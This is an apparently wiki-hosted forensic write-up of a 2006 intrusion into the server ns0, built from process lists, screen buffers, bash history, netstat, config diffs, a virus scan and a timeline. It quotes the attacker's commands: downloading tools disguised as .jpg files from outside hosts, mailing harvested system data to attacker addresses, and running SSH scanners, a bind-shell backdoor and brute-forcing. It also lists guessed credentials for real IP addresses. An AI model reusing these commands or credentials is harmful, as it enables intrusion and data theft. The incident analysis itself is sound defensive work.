Forensics on Incident 1
Revision as of 21:36, 24 November 2010 by PhilippeTeuwen (Reverted edits by Etegohy (Talk) to last revision by PhilippeTeuwen)
Breach in ns0 @ e..oss
Analysis
ps auwx: 2006/03/17 around 20:20
========
test 30731  0.0  0.0   676  284 ?     S  00:21 0:00 ./ntpd
test 31116  0.0  0.2  2944 1360 ?     Ss 00:28 0:00 SCREEN
test 31117  0.0  0.2  3000 1228 pts/5 Ss 00:28 0:00 /bin/bash
test 31134  0.0  0.2  3164 1368 pts/5 S+ 00:29 0:00 /bin/bash
test 32352  0.0  0.0  1444  280 ?     Ss 00:43 0:00 ./go
test 25680  0.0  0.2  2944 1412 ?     Ss 09:03 0:00 SCREEN
test 25681  0.0  0.3  3000 1656 pts/6 Ss 09:03 0:00 /bin/bash
test 25717  0.0  0.3  3160 1748 pts/6 S+ 09:03 0:00 /bin/bash
test  4132  0.0  0.0  1344  204 pts/5 T+ 10:40 0:00 ./go
test  4135  0.0  0.0     0    0 pts/5 Z+ 10:40 0:00 [go] <defunct>
test  3211  0.0  0.0  1344  240 pts/5 T+ 20:05 0:00 ./go
test  3224  0.0  0.0     0    0 pts/5 Z+ 20:05 0:00 [go] <defunct>
test  4088  0.0  0.2  2704 1260 pts/6 S+ 20:35 0:00 /bin/bash ./assh 24.35
test  4089 49.4  0.0  1492  456 pts/6 R+ 20:35 4:43 ./pscan2 24.35 22
test  4090  0.0  0.0     0    0 pts/6 Z+ 20:35 0:00 [pscan2] <defunct>
test  4097  0.0  0.2  2704 1260 pts/5 S+ 20:35 0:00 /bin/bash ./assh 200.56
test  4098 49.4  0.0  1492  456 pts/5 R+ 20:35 4:43 ./pscan2 200.56 22
test  4099  0.0  0.0     0    0 pts/5 Z+ 20:35 0:00 [pscan2] <defunct>

Reading: ./ntpd (PID 30731, started 00:21) is the psyBNC bouncer and ./go (PID 32352, 00:43) the bind-shell backdoor (see the IRC and Backdoor sections below); the two earlier ./go instances are stopped (T+) with defunct children. Two detached screen sessions (PIDs 31116 and 25680, on pts/5 and pts/6) each run ./assh, which drives one pscan2 instance scanning 24.35.0.0/16 and 200.56.0.0/16 for port 22.

Screens:
========
test@ns0:/root$ screen -ls
screen -r test/
There are screens on:
        31116.pts-4.ns0 (Detached)
        25680.pts-4.ns0 (Detached)
2 Sockets in /var/run/screen/S-test.
test@ns0:/root$ screen -r 31116

First screen:
=============
Copy of the current page:

bind: Address already in use
Norok in continuare
######################################################
#                 Compiled By D-a-N                  #
#----------------------------------------------------#
#                   Scaner Privat                    #
#----------------------------------------------------#
######################################################
# Incep sa scanez IPuri
# scanning: 200.58.255.* (total: 0) (100.0% done)
# pscan completed in 820 seconds. (found 0 ips)
# Cam putin : 0 de servere
----------------------------------------
# Se apropie sfarsitu :P Fii pe faza Dane..
ping: unknown host www.yahoo.com
Toata dragostea mea pentru diavola!!!!!!
bind: Address already in use
Norok in continuare
######################################################
#                 Compiled By D-a-N                  #
#----------------------------------------------------#
#                   Scaner Privat                    #
#----------------------------------------------------#
######################################################
# Incep sa scanez IPuri
# scanning: 200.59.112.* (total: 0) (43.9% done)

(Romanian: "Norok in continuare" = "good luck from here on"; "Scaner Privat" = "private scanner"; "Incep sa scanez IPuri" = "starting to scan IPs"; "Cam putin : 0 de servere" = "a bit few: 0 servers"; "Se apropie sfarsitu :P Fii pe faza Dane.." = "the end is near :P stay sharp, Dan.."; "Toata dragostea mea pentru diavola!!!!!!" = "all my love for diavola!!!!!!". The "bind: Address already in use" comes from the script restarting the backdoor while the earlier ./go still holds its port.)

Second screen:
==============
Copy of the full screen buffer:

test@ns0:/var/tmp/.. /dan$
test@ns0:/var/tmp/.. /dan$ ls
200               assh    gen-pass.sh  pass_file  sshf
200.221.pscan.22  auto    go           pscan2     ssh-scan
200.59.pscan.22   common  go.sh        ss         vuln.txt
bind: Address already in use
Norok in continuare
######################################################
#                 Compiled By D-a-N                  #
#----------------------------------------------------#
#                   Scaner Privat                    #
#----------------------------------------------------#
######################################################
# Incep sa scanez IPuri
# scanning: 24.37.255.* (total: 0) (100.0% done)
# pscan completed in 820 seconds. (found 0 ips)
# Cam putin : 0 de servere
----------------------------------------
# Se apropie sfarsitu :P Fii pe faza Dane..
ping: unknown host www.yahoo.com
Toata dragostea mea pentru diavola!!!!!!
bind: Address already in use
Norok in continuare
######################################################
#                 Compiled By D-a-N                  #
#----------------------------------------------------#
#                   Scaner Privat                    #
#----------------------------------------------------#
######################################################
# Incep sa scanez IPuri
# scanning: 24.38.136.* (total: 0) (53.3% done)
test@ns0:/var/tmp/.. /2$ ./auto
Enter A class range
24
Enter output file
24
test@ns0:/var/tmp/.. /2$ chmod +x 24
test@ns0:/var/tmp/.. /2$ ./24
######################################################
#                 Compiled By D-a-N                  #
#----------------------------------------------------#
#                   Scaner Privat                    #
#----------------------------------------------------#
######################################################
...

(The hidden working directory is literally named ".. " (dot, dot, space), created with mkdir .." " in the history below, so that it hides among the . and .. entries of ls -a.)

Bash history:
=============
Ran history in screen 25680.pts-4.ns0:
test@ns0:/var/tmp/.. /2$ history
Entries 1-48 are identical to .bash_history, then:
49 ./auto
50 chmod +x 24
51 ./24

Content of .bash_history:
ls
cd
ls
wget
wget rzv69.marte.ro/rzv69.tgz
tar zxvf rzv69.tgz
ls
del 404
wget fire.prohosting.com/claubuc/scaner.jpg
tar xzvf scaner.jpg
cd scaner
./assh 207.44
ls
./auto 207.44
./assh 213.186
cd /var/tmp
cd .." "
screen
w
passwd
w
cd /var/tmp
ls -a
cd /home/test/
ls -a
cd scaner
ls -a
cat vuln.txt
cd /var/tmp
cat /etc/hosts
su vinoj
su vinoj
su trollingsecours
su trollingsecours
su trollingsecours
cd /var/tmp
ls -a
mkdir .." "
cd .." "
wget fire.prohosting.com/scarlatu/dan.jpg
wget fire.prohosting.com/scarlatu/psy.jpg
tar xzvf psy.jpg
cd .bash
./ntpd
cd ..
tar xzvf dan.jpg
cd dan
screen
ls -a
./go.sh 200.41
./assh 200.41
exit
w
screen -r
screen -r 30860.pts-2.ns0
screen -r 31116.pts-4.ns0
cd /var/tmp
cd .." "
cd dan
pico vuln.txt
rm -rf vuln.txt
touch vuln.txt
cd ..
tar xzvf dan.jpg
ls -a
cd dan
ls -a
cd ..
mv dan 1
tar xzvf dan.jpg
mv dan 2
mv 1 dan
ls -a
cd 2
screen
screen -r
screen -r 30860.pts-2.ns0
screen -r
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
screen -r
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
cd /var/tmp
cd .." "
cd 2
pico vuln.txt
cd ..
cd dan
pico vuln.txt
cat vuln.txt
clear
w
screen -r
screen -r
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
w
ls -a
cd /var/tmp
cd .." "
cd dan
vi vuln.txt
cd /var/tmp
cd .." "
cd dan
vi vuln.txt
ls -a
cd ..
cd 2
vi vuln.txt
ls -a
w
screen -r
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
screen -r 25680.pts-4.ns0
screen -r 31116.pts-4.ns0
cd /var/tmp
cd .." "
cd .." "
cd dan
vi vuln.txt
ls -a
cd ..
cd 2
vi vuln.txt
ls -a
screen -r
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
screen -r 25680.pts-4.ns0
screen -r 31116.pts-4.ns0
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
ftp
screen -r
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
screen -r 25680.pts-4.ns0
screen -r 31116.pts-4.ns0
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
screen -r 25680.pts-4.ns0
screen -r 31116.pts-4.ns0
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
ftp
screen -r
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
w
screen -r
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
crontab -e

Tools:
======
* Attempt to download rzv69.marte.ro/rzv69.tgz, err 404
* Download tools from fire.prohosting.com/claubuc/scaner.jpg (tgz)
* Download tools from fire.prohosting.com/scarlatu/dan.jpg (tgz)
* Download tools from fire.prohosting.com/scarlatu/psy.jpg (tgz)
  (the .jpg names are disguised tarballs: the history unpacks them with tar xzvf)
* Romanian scripts
* Compiled By D-a-N
* cat log|mail -s 'linux-printer' usdpower@yahoo.com (dan tools)
* cat log|mail -s 'linux-printer' scaneru_meu@yahoo.com (scaner tools)

Scans:
======
* scan ssh on ranges 200.55 200.58 200.59 24.34 24.37 24.38 207.44 213.186
  (ps and the history above also show 24.35, 200.56 and 200.41 being scanned)
Netstat abstract (within the 800 simultaneous scans):
tcp 0 1 213.186.53.59:59930 24.35.236.71:22    SYN_SENT 4089/pscan2
tcp 0 1 213.186.53.59:60352 200.56.236.93:22   SYN_SENT 4098/pscan2
tcp 0 1 213.186.53.59:60288 200.56.236.29:22   SYN_SENT 4098/pscan2
tcp 0 1 213.186.53.59:60424 200.56.236.165:22  SYN_SENT 4098/pscan2
tcp 0 1 213.186.53.59:60233 200.56.235.229:22  SYN_SENT 4098/pscan2
tcp 0 1 213.186.53.59:60169 200.56.235.165:22  SYN_SENT 4098/pscan2
tcp 0 1 213.186.53.59:60095 200.56.235.91:22   SYN_SENT 4098/pscan2

IRC:
====
* Connection to IRC (6667) with psyBNC (running as ./ntpd) to 195.204.1.130
** 195.204.1.130 = oslo1.no.eu.undernet.org
Netstat:
tcp 0 0 0.0.0.0:6667        0.0.0.0:*           LISTEN      30731/ntpd
tcp 0 0 213.186.53.59:34227 195.204.1.130:6667  ESTABLISHED 30731/ntpd

Diffs between the downloaded tool and the hacker's version:
--- log/psybnc.log 1970-01-01 01:00:00.000000000 +0100 +++
log/psybnc.log 2006-03-19 23:32:53.000000000 +0100 @@ -0,0 +1,15 @@ +Fri Mar 17 00:21:14 :Listener created :0.0.0.0 port 6667 +Fri Mar 17 00:21:14 :psyBNC2.3BETA-cBtITLdDMSNp started (PID :30731) +Fri Mar 17 00:21:14 :Loading all Users.. +Fri Mar 17 00:21:14 :No Users found. +Fri Mar 17 00:21:29 :connect from 209-NAT.s-man.net +Fri Mar 17 00:21:31 :Lost Connection from 209-NAT.s-man.net (dan) +Fri Mar 17 00:22:31 :connect from 209-NAT.s-man.net +Fri Mar 17 00:22:39 :Noul User:dan (x) a fsot adaugat de dan +Fri Mar 17 00:22:48 :User dan () nu are nici un server adaugat +Fri Mar 17 00:23:05 :User dan () trying lelystad.nl.eu.undernet.org port 6667 (). +Fri Mar 17 00:23:05 :User dan () connected to lelystad.nl.eu.undernet.org:6667 () +Fri Mar 17 00:23:27 :Userul dan () A fost deconectat(de la lelystad.nl.eu.undernet.org) motivul: Closing Link: D4aNieL by Lelystad.NL.EU.UnderNet.Org (K-lined) +Fri Mar 17 00:23:42 :User dan () trying 195.204.1.130 port 6667 (). +Fri Mar 17 00:23:43 :User dan () connected to 195.204.1.130:6667 () +Fri Mar 17 00:30:35 :User dan quitted (from 209-NAT.s-man.net) --- motd/USER1.MOTD 1970-01-01 01:00:00.000000000 +0100 +++ motd/USER1.MOTD 2006-03-19 23:32:53.000000000 +0100 
@@ -0,0 +1,71 @@ +:Oslo1.NO.EU.undernet.org 001 D4aNieL :Welcome to the UnderNet IRC Network, D4aNieL +:Oslo1.NO.EU.undernet.org 002 D4aNieL :Your host is Oslo1.NO.EU.undernet.org, running version u2.10.11.07 +:Oslo1.NO.EU.undernet.org 003 D4aNieL :This server was created Mon Sep 5 2005 at 01:40:32 CEST +:Oslo1.NO.EU.undernet.org 004 D4aNieL Oslo1.NO.EU.undernet.org u2.10.11.07 dioswkgx biklmnopstvr bklov +:Oslo1.NO.EU.undernet.org 005 D4aNieL WHOX WALLCHOPS WALLVOICES USERIP CPRIVMSG CNOTICE SILENCE=15 MODES=6 MAXCHANNELS=30 MAXBANS=45 NICKLEN=12 MAXNICKLEN=15 :are supported by this server +:Oslo1.NO.EU.undernet.org 005 D4aNieL TOPICLEN=160 AWAYLEN=160 KICKLEN=160 CHANTYPES=#& PREFIX=(ov)@+ CHANMODES=b,k,l,imnpstr CASEMAPPING=rfc1459 NETWORK=UnderNet :are supported by this server +:Oslo1.NO.EU.undernet.org 251 D4aNieL :There are 31261 users and 80486 invisible on 28 servers +:Oslo1.NO.EU.undernet.org 252 D4aNieL 82 :operator(s) online +:Oslo1.NO.EU.undernet.org 253 D4aNieL 237 :unknown connection(s) +:Oslo1.NO.EU.undernet.org 254 D4aNieL 42167 :channels formed +:Oslo1.NO.EU.undernet.org 255 D4aNieL :I have 7253 clients and 1 servers +:Oslo1.NO.EU.undernet.org 375 D4aNieL :- Oslo1.NO.EU.undernet.org Message of the Day - +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- 2005-12-16 5:48 +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==> Welome to Oslo*.NO.EU.undernet.org +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==> Disclaimer / Rules +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- Irc is an umoderated international medium. Cloning is +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- strictly forbidden on this server, any clones will +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- not be tolerated. Mass Messaging / Mass Invites are not +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- allowed on any Undernet server, any offenders will be killed. 
+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- Using this server means you agree to all of its rules and the +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- rules of Undernet. If you cannot agree to this then /quit now. +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==> Server contact info: +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- E-mail : oslo@undernet.org +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==> News: +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- [12.05.2005] +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- We are out of news. +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- [12.12.2004] +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- We shut down the channel #banetele. Most of the users in there needed +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- reop/channel related helping and we have #nastrand for that. For info +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- not related to channel/user problems, email oslo@undernet.org. +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- [26.08.2003] +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- We are back online :) +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- Thank you to our provider www.banetele.com for all help! +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==> Ports: +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- 6666, 6667, 6668, 7000 +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==> Bot Policies: +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- It is allowed to run NON abusive bots on this server, all abusive +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- bots will be killed on sight. +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- Undernet has Cservice. 
Go to http://cservice.undernet.org +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- or #Cservice if you have any questions. +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==> Help Channels: +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- #nastrand -> Oper/IRC Help +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- #cservice -> Cservice questions +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- #mIRC -> For mIRC questions +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- #vh -> For help with viruses +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- #helpchan -> IRC Help +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- Please notice that these channels are not administrated by the +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- oslo.* crew and we and/or the server sponsors can not be held +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- responsible for actions taken or info given in the channels. +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==> AGAIN .. READ THIS !! +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- NO CLONES, NO FLOODING, NO HARASSING, NO SPAMMING! +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- The use of this server is no right, but a privilege. The admin(s) +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- and opers can revoke this priviledge without further notice and +:Oslo1.NO.EU.undernet.org 372 D4aNieL :- without a reason. +:Oslo1.NO.EU.undernet.org 376 D4aNieL :End of /MOTD command. --- psybnc.conf 2003-04-07 14:47:00.000000000 +0200 +++ psybnc.conf 2006-03-19 23:32:53.000000000 +0100 
@@ -1,3 +1,25 @@ PSYBNC.SYSTEM.PORT1=6667 PSYBNC.SYSTEM.HOST1=* PSYBNC.HOSTALLOWS.ENTRY0=*;* +USER1.USER.LOGIN=dan +USER1.USER.USER=x +USER1.USER.PASS==0x'q'0'W`2'S0I'F`x +USER1.USER.RIGHTS=1 +USER1.USER.VLINK=0 +USER1.USER.PPORT=0 +USER1.USER.PARENT=0 +USER1.USER.QUITTED=0 +USER1.USER.DCCENABLED=1 +USER1.USER.AUTOGETDCC=0 +USER1.USER.AIDLE=0 +USER1.USER.LEAVEQUIT=0 +USER1.USER.AUTOREJOIN=1 +USER1.USER.SYSMSG=1 +USER1.USER.LASTLOG=0 +USER1.USER.NICK=D-a-N +USER1.SERVERS.SERVER1=lelystad.nl.eu.undernet.org +USER1.SERVERS.PORT2=6667 +USER1.SERVERS.SERVER2=195.204.1.130 +USER1.SERVERS.PORT1=6667 +USER1.CHANNELS.ENTRY1=#porumbei +USER1.CHANNELS.ENTRY0=#xibit

Backdoor:
=========
* ./go opens port 19876 with a shell without auth
  cf http://www.2701.org/archive/200311240000.html
  Netstat:
  tcp 0 0 0.0.0.0:19876 0.0.0.0:* LISTEN 32352/go
* ./ss
  cf http://www.securiteam.com/tools/5EP0B0ADFO.html
  Fast SYN Scanner (libnet, libpcap), 11 Jul. 2004
  Credit: The information has been provided by Doctor BIOS.
  The following tool is a fast SYN scanner written in C.

vuln.txt:
=========
cf http://www.lockeddown.net/rst-expl.txt

ssh brute-force:
================
ssh-scan and sshf
./sshf <procese adika cate de alea deodata incerc>
  (Romanian: "processes, i.e. how many of those I try at once" ~= how many processes to run together)

/etc/passwd:
============
test:x:1024:1024:,,,:/home/test:/bin/false

mails:
======
Commands whose output the tool mails out (the mail -s 'linux-printer' lines under Tools):
cat /etc/passwd
/sbin/ifconfig |grep inet
cat /etc/hosts
uname -a
w
ping -c 3 www.yahoo.com
cat vuln.txt
chmod +x go
./go

Exim spool header (-H file) of one such mail found on ns0; the ",,," display name is the GECOS field of the test account (see /etc/passwd above):
139P Received: from test by ns0.exxoss.com with local (Exim 4.50) for usdpower@yahoo.com; Fri, 17 Mar 2006 17:35:14 +0100
023T To: usdpower@yahoo.com
023  Subject: linux-printer
047I Message-Id: <E1FKHv0-0008GG-4C@ns0.exxoss.com>
034F From: ",,," <test@ns0.exxoss.com>
038  Date: Fri, 17 Mar 2006 17:35:14 +0100

To-be-mailed data (user:password:host):
administrator:administrator:24.16.169.218
guest:guest:24.16.169.218
test:test:24.3.178.253
mysql:mysql:200.27.145.74
root:admin1:200.31.199.77
root:password:24.8.131.152
root:secure:24.11.225.20
root:123456:200.32.86.228
root:1234567890:200.32.86.228
root:admin1:200.32.86.228
root:admin:200.32.86.228
root:administrator1:200.32.86.228
root:backup:200.32.86.228
root:passwd:200.32.86.228
root:password123:200.32.86.228
root:password:200.32.86.228
root:qwerty:200.32.86.228
root:root1:200.32.86.228
root:root:200.32.86.228
root:rootroot:200.32.86.228
root:secret:200.32.86.228
root:secure:200.32.86.228
root:administrator:200.32.86.228
(200.32.86.228 "accepts" 16 different root passwords: probably a honeypot)

RST virus:
==========
Quick and dirty way to find infected files (prints the matching string, not the file name):
find . -type f -exec strings --all {} \; |grep snortdos

AV scan:
Files: "Dumb" scan of all files
Switches: -ARCHIVE -PACKED -SERVER
/tmp/scaner/go        Infection: Unix/RST.B
/tmp/scaner/pscan2    Infection: Unix/RST.B
/tmp/scaner/ss        Infection: Unix/RST.B
/tmp/scaner/ssh-scan  Infection: Unix/RST.B
/tmp/scaner/sshf      Infection: Unix/RST.B
Results of virus scanning:
Infected: 5

It seems the infected files rewrite themselves at each run and so update their mtime (the sizes are identical across all copies, only the timestamps differ):
/home/test/scaner:
 23714 2006-03-06 23:23 go
 25503 2005-05-06 19:00 pscan2
458068 2006-03-07 00:03 ss
846520 2006-03-07 00:03 sshf
846832 2006-03-06 23:12 ssh-scan
/var/tmp/.. /2:
 23714 2006-03-17 21:17 go
 25503 2006-03-17 21:17 pscan2
458068 2006-03-17 21:17 ss
846520 2006-03-17 21:17 sshf
846832 2006-03-17 21:17 ssh-scan
/var/tmp/.. /dan:
 23714 2006-03-17 10:35 go
 25503 2006-03-17 21:17 pscan2
458068 2006-03-17 21:17 ss
846520 2006-03-17 21:17 sshf
846832 2006-03-17 21:17 ssh-scan
21:17 corresponds to the crash of the server, so the infected executables were probably still held open even after being killed.

Note: the same virus is also present in:
/ns0/var/www/www.fmjbf.org/phpSecurePages/bindtty2: Linux.RST.B FOUND
/ns0/var/www/www.fmjbf.org/phpSecurePages/btty: Linux.RST.B FOUND

TIMELINE:
=========
Columns: date/time, source IP, marker, raw log line (syslog, vsftpd, Apache access log, last/wtmp and mactime entries merged). Markers: * = login or session of the test account, *! = file timestamps of the attacker's files, *!! = password change, *. = failed su from the test session, .* = failed ssh login as another user.

Summary: two waves. On Mar 6 at 22:28, after FTP probes and one failed attempt, 82.79.137.22 (metronetwork.rdsbz.ro) logs in as test over ssh and drops the scanner in /home/test/scaner; the admin (skycode) reboots the box several times on Mar 7. On Mar 17 at 00:12, 193.230.222.209 logs in as test again, changes the test password, fails su to vinoj and trollingsecours, and installs the tools under /var/tmp/.. /.

2006/02/16 08:58:08 82.79.137.30     vsftpd: Thu Feb 16 08:58:08 2006 [pid 23877] [demo] FAIL LOGIN: Client "82.79.137.30"
Mar 6 12:28:21 localhost sshd[31087]: error: PAM: Authentication failure for skycode from 193.190-200-80.adsl.skynet.be
Mar 6 12:28:24 localhost sshd[31087]: Accepted keyboard-interactive/pam for skycode from 80.200.190.193 port 13329 ssh2
Mar 6 12:29:31 localhost sudo: skycode : TTY=pts/3 ; PWD=/home/skycode ; USER=root ; COMMAND=/bin/bash
Mar 06 06 12:30:50 4096 m.c drwxr-xr-x root root /etc/webmin
                    639 m.c -rw------- root root /etc/webmin/miniserv.conf
Mar 6 12:31:05 localhost webmin[31297]: Webmin starting
Mar 6 12:31:13 localhost webmin[31307]: Successful login as root from 193.190-200-80.adsl.skynet.be
2006/03/06 13:48:47 82.79.137.24 *   vsftpd: Mon Mar 6 13:48:47 2006 [pid 4586] [test] OK LOGIN: Client "82.79.137.24"
Mar 03 06 15:53:30 21 m.c -rw-r----- root shadow /etc/webmin/miniserv.users
Mar 03 06 16:11:31 4096 m.c drwxr-xr-x root root /etc/exim4
                   7838 m.c -rw-r--r-- root root /etc/exim4/exim4.conf
Mar 6 17:59:47 localhost sshd[22697]: Accepted keyboard-interactive/pam for skycode from 80.201.157.39 port 11272 ssh2
Mar 6 19:43:12 localhost sshd[32573]: Accepted publickey for dorian1200 from 217.117.45.148 port 49764 ssh2
Mar 6 19:43:17 localhost sudo: dorian1200 : TTY=pts/4 ; PWD=/home/dorian1200 ; USER=root ; COMMAND=/bin/bash
Mar 6 20:22:42 localhost sshd[3285]: Accepted keyboard-interactive/pam for skycode from 80.201.157.39 port 12754 ssh2
dorian12 pts/2 217.117.45.148 Mon Mar 6 21:38 - 21:40 (00:01)
Mar 6 21:38:37 localhost sshd[10242]: Accepted publickey for dorian1200 from 217.117.45.148 port 44246 ssh2
Mar 6 21:38:44 localhost sudo: dorian1200 : TTY=pts/2 ; PWD=/home/dorian1200 ; USER=root ; COMMAND=/bin/bash
2006/03/06 22:27:30 82.79.137.26     26.metronetwork.rdsbz.ro - - [06/Mar/2006:22:27:30 +0100] "GET / HTTP/1.1" 200 1053 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "-"
2006/03/06 22:27:31 82.79.137.26     26.metronetwork.rdsbz.ro - - [06/Mar/2006:22:27:31 +0100] "GET /logowhite.png HTTP/1.1" 200 19801 "http://213.186.53.56/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "-"
2006/03/06 22:28:16 82.79.137.27     Mar 6 22:28:16 localhost vsftpd: (pam_unix) authentication failure; logname= uid=0 euid=0 tty= ruser= rhost=82.79.137.27
2006/03/06 22:28:18 82.79.137.27     vsftpd: Mon Mar 6 22:28:18 2006 [pid 14875] [anonymous] FAIL LOGIN: Client "82.79.137.27"
2006/03/06 22:28:18 82.79.137.18     Mar 6 22:28:18 localhost vsftpd: (pam_unix) authentication failure; logname= uid=0 euid=0 tty= ruser= rhost=82.79.137.18
2006/03/06 22:28:20 82.79.137.18     vsftpd: Mon Mar 6 22:28:20 2006 [pid 14881] [anonymous] FAIL LOGIN: Client "82.79.137.18"
2006/03/06 22:28:29 82.79.137.25 *   vsftpd: Mon Mar 6 22:28:29 2006 [pid 14911] [test] OK LOGIN: Client "82.79.137.25"
2006/03/06 22:28:30 82.79.137.14 *   vsftpd: Mon Mar 6 22:28:30 2006 [pid 14914] [test] OK LOGIN: Client "82.79.137.14"
2006/03/06 22:28:39 82.79.137.22     Mar 6 22:28:39 localhost sshd[14930]: (pam_unix) authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=22.metronetwork.rdsbz.ro user=test
2006/03/06 22:28:41 82.79.137.22     Mar 6 22:28:41 localhost sshd[14924]: error: PAM: Authentication failure for test from 22.metronetwork.rdsbz.ro
2006/03/06 22:28:43 82.79.137.22 *   Mar 6 22:28:43 localhost sshd[14924]: Accepted keyboard-interactive/pam for test from 82.79.137.22 port 1383 ssh2
2006/03/06 22:28:43 82.79.137.22 *   Mar 6 22:28:43 localhost sshd[14934]: (pam_unix) session opened for user test by (uid=0)
2006/03/06 22:28    82.79.137.22 *   test pts/2 82.79.137.22 Mon Mar 6 22:28 - 00:21 (01:52)
2006/03/06 22:31:06 82.79.137.18     Mar 6 22:31:06 localhost sshd[15200]: Illegal user asd from 82.79.137.18
2006/03/06 22:40:54 82.79.137.22 *!  Mar 06 06 22:40:54 167818 m.. -rw-r--r-- test test /home/test/scaner/207.44.pscan.22
2006/03/06 23:12:35 82.79.137.22 *!  Mar 06 06 23:12:35 846832 m.. -rwxr-xr-x test test /home/test/scaner/ssh-scan
2006/03/06 23:23:56 82.79.137.22 *!  Mar 06 06 23:23:56 23714 m.. -rwxr-xr-x test test /home/test/scaner/go
2006/03/06 23:29:14 82.79.137.7  *   vsftpd: Mon Mar 6 23:29:14 2006 [pid 20547] [test] OK LOGIN: Client "82.79.137.7"
2006/03/07 00:03:34 82.79.137.22 *!  Mar 07 06 00:03:34 846520 m.. -rwxr-xr-x test test /home/test/scaner/sshf
2006/03/07 00:03:34 82.79.137.22 *!  4096 m.. drwxr-xr-x test test /home/test/scaner
2006/03/07 00:03:34 82.79.137.22 *!  458068 m.. -rwxr-xr-x test test /home/test/scaner/ss
skycode pts/3 213.186.53.55 Tue Mar 7 00:14 - down (00:45)
2006/03/07 00:21:24 82.79.137.22 *   Mar 7 00:21:24 localhost sshd[14934]: (pam_unix) session closed for user test
skycode pts/2 213.186.53.55 Tue Mar 7 00:58 - down (00:01)
runlevel (to lvl 6) Tue Mar 7 00:59 - 00:59 (00:00) 2.4.27-2-386
shutdown system down Tue Mar 7 00:59 - 01:02 (00:02) 2.4.27-2-386
reboot system boot Tue Mar 7 01:02 - 08:45 (07:42) 2.4.27-2-386
runlevel (to lvl 2) Tue Mar 7 01:02 - 08:45 (07:42) 2.4.27-2-386
skycode pts/0 Tue Mar 7 01:04 - 01:04 (00:00) 213.186.53.55
skycode pts/0 Tue Mar 7 08:28 - down (00:16) 213.186.53.55
runlevel (to lvl 6) Tue Mar 7 08:45 - 08:45 (00:00) 2.4.27-2-386
shutdown system down Tue Mar 7 08:45 - 08:48 (00:02) 2.4.27-2-386
reboot system boot Tue Mar 7 08:48 - 09:18 (00:30) 2.4.27-2-386
runlevel (to lvl 2) Tue Mar 7 08:48 - 09:18 (00:30) 2.4.27-2-386
skycode pts/0 Tue Mar 7 08:56 - down (00:22) 213.186.53.55
skycode pts/1 Tue Mar 7 09:17 - down (00:01) 213.186.53.55
runlevel (to lvl 6) Tue Mar 7 09:18 - 09:18 (00:00) 2.4.27-2-386
shutdown system down Tue Mar 7 09:18 - 09:22 (00:03) 2.4.27-2-386
reboot system boot Tue Mar 7 09:22 - 09:25 (00:03) 2.4.27-2-386
